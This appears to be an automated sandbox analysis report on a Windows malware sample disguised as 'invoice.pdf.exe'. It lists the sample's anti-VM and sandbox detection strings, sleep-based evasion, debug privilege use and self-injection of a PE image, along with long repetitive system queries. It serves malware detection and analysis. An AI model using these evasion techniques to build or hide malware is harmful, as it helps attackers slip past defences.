Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR

Source: C:\Users\user\Desktop\invoice.pdf.exe

File opened: C:\Windows\WinSxS\x86_microsoft.vc80.crt_1fc8b3b9a1e18e3b_8.0.50727.9445_none_d08c58b4442ba54f\MSVCR80.dll

Jump to behavior

Source: invoice.pdf.exe

Static PE information: NO_SEH, TERMINAL_SERVER_AWARE, DYNAMIC_BASE, NX_COMPAT

Source:

Data Obfuscation:

Source: C:\Users\user\Desktop\invoice.pdf.exe	Code function: 1_2_008FA944 push ds; ret	1_2_008FA95B
Source: C:\Users\user\Desktop\invoice.pdf.exe	Code function: 1_2_048ECC94 push ss; ret	1_2_048ECCD6
Source: C:\Users\user\Desktop\invoice.pdf.exe	Code function: 1_2_048E9C53 push E9FFFFFEh; retf	1_2_048E9C58
Source: C:\Users\user\Desktop\invoice.pdf.exe	Code function: 1_2_048ECDE8 push ss; ret	1_2_048ECDF6
Source: C:\Users\user\Desktop\invoice.pdf.exe	Code function: 1_2_048ECD11 push ss; ret	1_2_048ECD1E
Source: C:\Users\user\Desktop\invoice.pdf.exe	Code function: 1_2_048E52C1 push ss; ret	1_2_048E52CE
Source: C:\Users\user\Desktop\invoice.pdf.exe	Code function: 1_2_048E5268 push ss; ret	1_2_048E52A6
Source: C:\Users\user\Desktop\invoice.pdf.exe	Code function: 1_2_048E4FCA push ss; ret	1_2_048E4FCC
Source: C:\Users\user\Desktop\invoice.pdf.exe	Code function: 1_2_048E4F1D push ss; ret	1_2_048E4F1F
Source: C:\Users\user\Desktop\invoice.pdf.exe	Code function: 1_2_048E5318 push ss; ret	1_2_048E5326
Source: C:\Users\user\Desktop\invoice.pdf.exe	Code function: 1_2_048E4F2E push ss; ret	1_2_048E4F30
Source: C:\Users\user\Desktop\invoice.pdf.exe	Code function: 1_2_048E4F6D push ss; ret	1_2_048E4F6F

Source: initial sample

Static PE information: section name: .text entropy: 7.60133626951

Hooking and other Techniques for Hiding and Protection:

Uses an obfuscated file name to hide its real file extension (double extension)

Show sources

Source: Possible double extension: pdf.exe

Static PE information: invoice.pdf.exe

Source: C:\Users\user\Desktop\invoice.pdf.exe

Registry key monitored for changes: HKEY_CURRENT_USER_Classes

Jump to behavior

Source: C:\Users\user\Desktop\invoice.pdf.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\invoice.pdf.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\invoice.pdf.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\invoice.pdf.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\invoice.pdf.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\invoice.pdf.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\invoice.pdf.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\invoice.pdf.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\invoice.pdf.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\invoice.pdf.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\invoice.pdf.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\invoice.pdf.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\invoice.pdf.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\invoice.pdf.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\invoice.pdf.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\invoice.pdf.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\invoice.pdf.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\invoice.pdf.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\invoice.pdf.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\invoice.pdf.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\invoice.pdf.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\invoice.pdf.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\invoice.pdf.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\invoice.pdf.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\invoice.pdf.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\invoice.pdf.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\invoice.pdf.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\invoice.pdf.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\invoice.pdf.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\invoice.pdf.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\invoice.pdf.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\invoice.pdf.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\invoice.pdf.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\invoice.pdf.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\invoice.pdf.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\invoice.pdf.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\invoice.pdf.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\invoice.pdf.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\invoice.pdf.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\invoice.pdf.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\invoice.pdf.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\invoice.pdf.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\invoice.pdf.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\invoice.pdf.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\invoice.pdf.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\invoice.pdf.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\invoice.pdf.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\invoice.pdf.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\invoice.pdf.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\invoice.pdf.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\invoice.pdf.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\invoice.pdf.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\invoice.pdf.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\invoice.pdf.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\invoice.pdf.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\invoice.pdf.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\invoice.pdf.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\invoice.pdf.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\invoice.pdf.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\invoice.pdf.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\invoice.pdf.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\invoice.pdf.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\invoice.pdf.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\invoice.pdf.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\invoice.pdf.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\invoice.pdf.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\invoice.pdf.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\invoice.pdf.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\invoice.pdf.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\invoice.pdf.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\invoice.pdf.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\invoice.pdf.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\invoice.pdf.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\invoice.pdf.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\invoice.pdf.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\invoice.pdf.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\invoice.pdf.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\invoice.pdf.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\invoice.pdf.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\invoice.pdf.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\invoice.pdf.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\invoice.pdf.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\invoice.pdf.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\invoice.pdf.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior

Malware Analysis System Evasion:

Yara detected AntiVM_3

Show sources

Source: Yara match	File source: 00000001.00000002.240792649.0000000002701000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match	File source: Process Memory Space: invoice.pdf.exe PID: 6496, type: MEMORY
Source: Yara match	File source: 1.2.invoice.pdf.exe.27287c8.1.raw.unpack, type: UNPACKEDPE

Found evasive API chain (trying to detect sleep duration tampering with parallel thread)

Show sources

Source: C:\Users\user\Desktop\invoice.pdf.exe

Function Chain: memAlloc,systemQueried,systemQueried,threadCreated,threadResumed,threadDelayed,threadDelayed,threadDelayed,systemQueried,systemQueried,threadDelayed,threadDelayed,threadDelayed,systemQueried,systemQueried,threadDelayed,systemQueried,threadDelayed,threadDelayed,processSet,processSet,memAlloc,memAlloc,memAlloc,memAlloc

Queries sensitive BIOS Information (via WMI, Win32_Bios & Win32_BaseBoard, often done to detect virtual machines)

Show sources

Source: C:\Users\user\Desktop\invoice.pdf.exe

WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_BaseBoard

Queries sensitive network adapter information (via WMI, Win32_NetworkAdapter, often done to detect virtual machines)

Show sources

Source: C:\Users\user\Desktop\invoice.pdf.exe

WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_NetworkAdapterConfiguration

Tries to detect sandboxes and other dynamic analysis tools (process name or module or function)

Show sources

Source: invoice.pdf.exe, 00000001.00000002.240792649.0000000002701000.00000004.00000001.sdmp	Binary or memory string: SBIEDLL.DLL
Source: invoice.pdf.exe, 00000001.00000002.240792649.0000000002701000.00000004.00000001.sdmp	Binary or memory string: KERNEL32.DLL.WINE_GET_UNIX_FILE_NAME

Source: C:\Users\user\Desktop\invoice.pdf.exe	Thread delayed: delay time: 922337203685477			Jump to behavior
Source: C:\Users\user\Desktop\invoice.pdf.exe	Thread delayed: delay time: 922337203685477			Jump to behavior

Source: C:\Users\user\Desktop\invoice.pdf.exe

Window / User API: threadDelayed 682

Jump to behavior

Source: C:\Users\user\Desktop\invoice.pdf.exe TID: 6500	Thread sleep time: -102132s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\invoice.pdf.exe TID: 6532	Thread sleep time: -922337203685477s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\invoice.pdf.exe TID: 6884	Thread sleep time: -922337203685477s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\invoice.pdf.exe TID: 6884	Thread sleep count: 682 > 30	Jump to behavior
Source: C:\Users\user\Desktop\invoice.pdf.exe TID: 6884	Thread sleep time: -20460000s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\invoice.pdf.exe TID: 6884	Thread sleep time: -30000s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\invoice.pdf.exe TID: 6884	Thread sleep time: -30000s >= -30000s	Jump to behavior

Source: C:\Users\user\Desktop\invoice.pdf.exe	WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
Source: C:\Users\user\Desktop\invoice.pdf.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor

Source: C:\Users\user\Desktop\invoice.pdf.exe	Last function: Thread delayed
Source: C:\Users\user\Desktop\invoice.pdf.exe	Last function: Thread delayed

Source: invoice.pdf.exe, 00000001.00000002.240792649.0000000002701000.00000004.00000001.sdmp	Binary or memory string: InstallPathJC:\PROGRAM FILES\VMWARE\VMWARE TOOLS\
Source: invoice.pdf.exe, 00000002.00000002.509433781.0000000005A40000.00000002.00000001.sdmp	Binary or memory string: A Virtual Machine could not be started because Hyper-V is not installed.
Source: invoice.pdf.exe, 00000001.00000002.240792649.0000000002701000.00000004.00000001.sdmp	Binary or memory string: vmware
Source: invoice.pdf.exe, 00000002.00000002.509433781.0000000005A40000.00000002.00000001.sdmp	Binary or memory string: A communication protocol error has occurred between the Hyper-V Host and Guest Compute Service.
Source: invoice.pdf.exe, 00000002.00000002.509433781.0000000005A40000.00000002.00000001.sdmp	Binary or memory string: The communication protocol version between the Hyper-V Host and Guest Compute Services is not supported.
Source: invoice.pdf.exe, 00000001.00000002.240792649.0000000002701000.00000004.00000001.sdmp	Binary or memory string: VMware SVGA II
Source: invoice.pdf.exe, 00000002.00000002.503848287.00000000017EB000.00000004.00000020.sdmp	Binary or memory string: Hyper-V RAW123255IPXMediaType
Source: invoice.pdf.exe, 00000002.00000002.503848287.00000000017EB000.00000004.00000020.sdmp	Binary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dll
Source: invoice.pdf.exe, 00000001.00000002.240792649.0000000002701000.00000004.00000001.sdmp	Binary or memory string: VMWAREDSOFTWARE\VMware, Inc.\VMware Tools
Source: invoice.pdf.exe, 00000002.00000002.509433781.0000000005A40000.00000002.00000001.sdmp	Binary or memory string: An unknown internal message was received by the Hyper-V Compute Service.

Source: C:\Users\user\Desktop\invoice.pdf.exe

Process information queried: ProcessInformation

Jump to behavior

Anti Debugging:

Source: C:\Users\user\Desktop\invoice.pdf.exe

Code function: 2_2_01A03A88 LdrInitializeThunk,

2_2_01A03A88

Source: C:\Users\user\Desktop\invoice.pdf.exe

Process token adjusted: Debug

Jump to behavior

Source: C:\Users\user\Desktop\invoice.pdf.exe

Memory allocated: page read and write | page guard

Jump to behavior

HIPS / PFW / Operating System Protection Evasion:

Injects a PE file into a foreign processes

Show sources

Source: C:\Users\user\Desktop\invoice.pdf.exe

Memory written: C:\Users\user\Desktop\invoice.pdf.exe base: 400000 value starts with: 4D5A

Jump to behavior

Source: C:\Users\user\Desktop\invoice.pdf.exe

Process created: C:\Users\user\Desktop\invoice.pdf.exe C:\Users\user\Desktop\invoice.pdf.exe

Jump to behavior

Source: invoice.pdf.exe, 00000002.00000002.504585731.0000000001E50000.00000002.00000001.sdmp	Binary or memory string: uProgram Manager
Source: invoice.pdf.exe, 00000002.00000002.504585731.0000000001E50000.00000002.00000001.sdmp	Binary or memory string: Shell_TrayWnd
Source: invoice.pdf.exe, 00000002.00000002.504585731.0000000001E50000.00000002.00000001.sdmp	Binary or memory string: Progman
Source: invoice.pdf.exe, 00000002.00000002.504585731.0000000001E50000.00000002.00000001.sdmp	Binary or memory string: Progmanlock

Language, Device and Operating System Detection:

Source: C:\Users\user\Desktop\invoice.pdf.exe	Queries volume information: C:\Windows\Fonts\arial.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\invoice.pdf.exe	Queries volume information: C:\Windows\Fonts\ariali.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\invoice.pdf.exe	Queries volume information: C:\Windows\Fonts\arialbd.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\invoice.pdf.exe	Queries volume information: C:\Windows\Fonts\arialbi.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\invoice.pdf.exe	Queries volume information: C:\Windows\Fonts\ARIALN.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\invoice.pdf.exe	Queries volume information: C:\Windows\Fonts\ariblk.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\invoice.pdf.exe	Queries volume information: C:\Windows\Fonts\ARIALNI.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\invoice.pdf.exe	Queries volume information: C:\Windows\Fonts\ARIALNB.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\invoice.pdf.exe	Queries volume information: C:\Windows\Fonts\ARIALNBI.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\invoice.pdf.exe	Queries volume information: C:\Windows\Fonts\bahnschrift.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\invoice.pdf.exe	Queries volume information: C:\Windows\Fonts\calibri.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\invoice.pdf.exe	Queries volume information: C:\Windows\Fonts\calibril.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\invoice.pdf.exe	Queries volume information: C:\Windows\Fonts\calibrii.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\invoice.pdf.exe	Queries volume information: C:\Windows\Fonts\calibrili.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\invoice.pdf.exe	Queries volume information: C:\Windows\Fonts\calibrib.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\invoice.pdf.exe	Queries volume information: C:\Windows\Fonts\calibriz.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\invoice.pdf.exe	Queries volume information: C:\Windows\Fonts\cambria.ttc VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\invoice.pdf.exe	Queries volume information: C:\Windows\Fonts\cambriai.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\invoice.pdf.exe	Queries volume information: C:\Windows\Fonts\cambriab.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\invoice.pdf.exe	Queries volume information: C:\Windows\Fonts\cambriaz.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\invoice.pdf.exe	Queries volume information: C:\Windows\Fonts\Candara.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\invoice.pdf.exe	Queries volume information: C:\Windows\Fonts\Candarai.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\invoice.pdf.exe	Queries volume information: C:\Windows\Fonts\Candarab.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\invoice.pdf.exe	Queries volume information: C:\Windows\Fonts\Candaraz.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\invoice.pdf.exe	Queries volume information: C:\Windows\Fonts\comic.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\invoice.pdf.exe	Queries volume information: C:\Windows\Fonts\comici.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\invoice.pdf.exe	Queries volume information: C:\Windows\Fonts\comicbd.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\invoice.pdf.exe	Queries volume information: C:\Windows\Fonts\comicz.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\invoice.pdf.exe	Queries volume information: C:\Windows\Fonts\consola.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\invoice.pdf.exe	Queries volume information: C:\Windows\Fonts\consolai.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\invoice.pdf.exe	Queries volume information: C:\Windows\Fonts\consolab.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\invoice.pdf.exe	Queries volume information: C:\Windows\Fonts\consolaz.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\invoice.pdf.exe	Queries volume information: C:\Windows\Fonts\constan.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\invoice.pdf.exe	Queries volume information: C:\Windows\Fonts\constani.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\invoice.pdf.exe	Queries volume information: C:\Windows\Fonts\constanb.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\invoice.pdf.exe	Queries volume information: C:\Windows\Fonts\constanz.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\invoice.pdf.exe	Queries volume information: C:\Windows\Fonts\corbel.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\invoice.pdf.exe	Queries volume information: C:\Windows\Fonts\corbeli.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\invoice.pdf.exe	Queries volume information: C:\Windows\Fonts\corbelb.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\invoice.pdf.exe	Queries volume information: C:\Windows\Fonts\corbelz.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\invoice.pdf.exe	Queries volume information: C:\Windows\Fonts\cour.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\invoice.pdf.exe	Queries volume information: C:\Windows\Fonts\couri.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\invoice.pdf.exe	Queries volume information: C:\Windows\Fonts\courbd.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\invoice.pdf.exe	Queries volume information: C:\Windows\Fonts\courbi.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\invoice.pdf.exe	Queries volume information: C:\Windows\Fonts\ebrima.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\invoice.pdf.exe	Queries volume information: C:\Windows\Fonts\ebrimabd.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\invoice.pdf.exe	Queries volume information: C:\Windows\Fonts\framd.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\invoice.pdf.exe	Queries volume information: C:\Windows\Fonts\FRADM.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\invoice.pdf.exe	Queries volume information: C:\Windows\Fonts\framdit.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\invoice.pdf.exe	Queries volume information: C:\Windows\Fonts\FRADMIT.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\invoice.pdf.exe	Queries volume information: C:\Windows\Fonts\FRAMDCN.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\invoice.pdf.exe	Queries volume information: C:\Windows\Fonts\FRADMCN.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\invoice.pdf.exe	Queries volume information: C:\Windows\Fonts\FRAHV.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\invoice.pdf.exe	Queries volume information: C:\Windows\Fonts\FRAHVIT.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\invoice.pdf.exe	Queries volume information: C:\Windows\Fonts\Gabriola.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\invoice.pdf.exe	Queries volume information: C:\Windows\Fonts\gadugi.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\invoice.pdf.exe	Queries volume information: C:\Windows\Fonts\gadugib.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\invoice.pdf.exe	Queries volume information: C:\Windows\Fonts\georgia.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\invoice.pdf.exe	Queries volume information: C:\Windows\Fonts\georgiai.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\invoice.pdf.exe	Queries volume information: C:\Windows\Fonts\georgiab.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\invoice.pdf.exe	Queries volume information: C:\Windows\Fonts\georgiaz.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\invoice.pdf.exe	Queries volume information: C:\Windows\Fonts\impact.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\invoice.pdf.exe	Queries volume information: C:\Windows\Fonts\Inkfree.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\invoice.pdf.exe	Queries volume information: C:\Windows\Fonts\javatext.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\invoice.pdf.exe	Queries volume information: C:\Windows\Fonts\LeelawUI.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\invoice.pdf.exe	Queries volume information: C:\Windows\Fonts\LeelUIsl.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\invoice.pdf.exe	Queries volume information: C:\Windows\Fonts\LeelaUIb.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\invoice.pdf.exe	Queries volume information: C:\Windows\Fonts\lucon.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\invoice.pdf.exe	Queries volume information: C:\Windows\Fonts\l_10646.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\invoice.pdf.exe	Queries volume information: C:\Windows\Fonts\malgun.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\invoice.pdf.exe	Queries volume information: C:\Windows\Fonts\malgunsl.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\invoice.pdf.exe	Queries volume information: C:\Windows\Fonts\malgunbd.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\invoice.pdf.exe	Queries volume information: C:\Windows\Fonts\himalaya.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\invoice.pdf.exe	Queries volume information: C:\Windows\Fonts\msjh.ttc VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\invoice.pdf.exe	Queries volume information: C:\Windows\Fonts\msjhl.ttc VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\invoice.pdf.exe	Queries volume information: C:\Windows\Fonts\msjhbd.ttc VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\invoice.pdf.exe	Queries volume information: C:\Windows\Fonts\ntailu.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\invoice.pdf.exe	Queries volume information: C:\Windows\Fonts\ntailub.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\invoice.pdf.exe	Queries volume information: C:\Windows\Fonts\phagspa.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\invoice.pdf.exe	Queries volume information: C:\Windows\Fonts\phagspab.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\invoice.pdf.exe	Queries volume information: C:\Windows\Fonts\micross.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\invoice.pdf.exe	Queries volume information: C:\Windows\Fonts\taile.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\invoice.pdf.exe	Queries volume information: C:\Windows\Fonts\taileb.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\invoice.pdf.exe	Queries volume information: C:\Windows\Fonts\msyh.ttc VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\invoice.pdf.exe	Queries volume information: C:\Windows\Fonts\msyhl.ttc VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\invoice.pdf.exe	Queries volume information: C:\Windows\Fonts\msyhbd.ttc VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\invoice.pdf.exe	Queries volume information: C:\Windows\Fonts\msyi.ttf VolumeInformation	Jump to behavior
